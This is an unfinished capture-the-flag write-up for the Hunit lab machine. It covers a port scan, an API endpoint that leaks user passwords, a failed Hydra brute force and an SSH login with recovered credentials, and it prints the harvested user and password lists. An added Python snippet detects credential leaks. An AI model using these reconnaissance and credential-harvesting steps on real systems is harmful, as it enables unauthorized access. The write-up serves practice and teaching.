# Hunit (WIP)

## Nmap

```
sudo nmap 192.168.79.125 -p- -sS -sV

Not shown: 65531 filtered ports
PORT      STATE SERVICE    VERSION
8080/tcp  open  http-proxy
12445/tcp open  unknown
18030/tcp open  http       Apache httpd 2.4.46 ((Unix))
43022/tcp open  ssh        OpenSSH 8.4 (protocol 2.0)
```

Browsing to port 8080 takes us to a web page for haikus.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4d7ef279f2cc9d71a9475b3a09c4a55fa0587f4d%2Fimage.png?alt=media)

We can individually browse to each haiku.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-30b2cdc0c2f2c9000432d333faeadb7d4cddd512%2Fimage.png?alt=media)

Checking the page source for any haiku reveals a comment referring to an API.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5816c822b407dc2f74c791c2f52078026f6d534a%2Fimage.png?alt=media)

Running curl against the API reveals further information.

```
curl http://192.168.79.125:8080/api/
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4664274a180d9824495e46a69265d30c5b000bec%2Fimage.png?alt=media)

Running curl against the user API directory reveals sensitive information regarding each user.

```
curl http://192.168.79.125:8080/api/user/
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-bb704a1bff77d1d93df26dea8e83a4c2f2485826%2Fimage.png?alt=media)
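A defensive counterpart to this finding, as an added example that is not part of the original write-up: a check a service owner could run in CI or at an API gateway to flag and strip credential-like fields from a JSON response before it is served. The response shape, field names and key-name pattern are assumptions, and the sample data is constructed.

```python
import json
import re

# Key names treated as secrets; this pattern is an assumption, tune it per API.
SENSITIVE_KEY = re.compile(r"pass(word|wd)?|secret|token|api[_-]?key|private[_-]?key", re.I)

# Constructed sample shaped like a user-listing response; field names and
# values are illustrative and are not taken from the target's real output.
SAMPLE_RESPONSE = json.dumps([
    {"login": "user1", "firstName": "A", "role": "editor", "password": "constructed-value-1"},
    {"login": "user2", "role": "admin", "password": "constructed-value-2",
     "profile": {"apiToken": "constructed-token"}},
])

def find_sensitive_fields(node, path="$"):
    """Return the JSON path of every key whose name looks like a credential."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if SENSITIVE_KEY.search(key):
                hits.append(child)
            hits.extend(find_sensitive_fields(value, child))
    elif isinstance(node, list):
        for i, item in enumerate(node):
            hits.extend(find_sensitive_fields(item, f"{path}[{i}]"))
    return hits

def redact(node):
    """Return a copy of the document with credential-like fields dropped."""
    if isinstance(node, dict):
        return {k: redact(v) for k, v in node.items() if not SENSITIVE_KEY.search(k)}
    if isinstance(node, list):
        return [redact(item) for item in node]
    return node

def audit(body):
    """Parse a response body; return (leaking paths, safe-to-serve document)."""
    doc = json.loads(body)
    return find_sensitive_fields(doc), redact(doc)

if __name__ == "__main__":
    leaks, safe = audit(SAMPLE_RESPONSE)
    for leak in leaks:
        print("credential field exposed:", leak)
    print(json.dumps(safe, indent=2))
```

Failing the build when `audit` returns any paths for an unauthenticated route catches this class of exposure before deployment; redaction at the gateway is a backstop, not a substitute for removing the field from the serializer.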

Compiling each user's login name and password gives us a user list and a password list.

{% tabs %}
{% tab title="Users" %}

```
rjackson
dademola
jvargas
jsanchez
```

{% endtab %}
{% endtabs %}

{% tabs %}
{% tab title="Passwords" %}

```
yYJcgYqszv4aGQ
ExplainSlowQuest110
KTuGcSW6Zxwd0Q
d52cQ1BzyNQycg
OuQ96hcgiM5o9w
```

{% endtab %}
{% endtabs %}

I then tried bruteforcing this with Hydra and was unable to get a result.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-06348ae53bc3a3c9f30f2efeffd276f2cf0d5bfd%2Fimage.png?alt=media)

Inspecting our found information further, we find that all the users are 'Editors' and David is an admin. The password associated with David is also greatly different from the rest. I then tried a manual login with SSH.

```
ssh -p 43022 dademola@192.168.79.125
```

Valid credentials: `dademola:ExplainSlowQuest110`

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-19d194937ff7bb2d8ee286903d23df4413d944a4%2Fimage.png?alt=media)

Looking for other users in /home/, we see we have the Git user. Checking the contents of the directory, we also have an `id_rsa` key.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6566c4d5f7e4b3b0b62eab3e6a24c69f61f0af6a%2Fimage.png?alt=media)
